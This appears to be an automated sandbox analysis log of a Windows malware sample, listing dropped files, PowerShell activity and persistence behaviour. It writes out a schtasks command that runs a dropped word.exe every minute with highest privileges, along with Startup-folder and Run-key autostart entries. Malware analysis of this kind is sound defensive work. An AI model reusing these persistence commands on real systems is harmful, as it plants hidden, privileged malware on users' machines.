Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File created: C:\Users\user\AppData\Roaming\word.exe	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\_socket.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\python312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI58162\_ctypes.pyd	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\bound.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe"

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Jump to behavior

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bound.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\word.lnk

Source: C:\Users\user\AppData\Local\Temp\bound.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run word
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run word

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

Code function: 0_2_00007FF6448776C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

0_2_00007FF6448776C0

Source: C:\Users\user\AppData\Local\Temp\bound.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
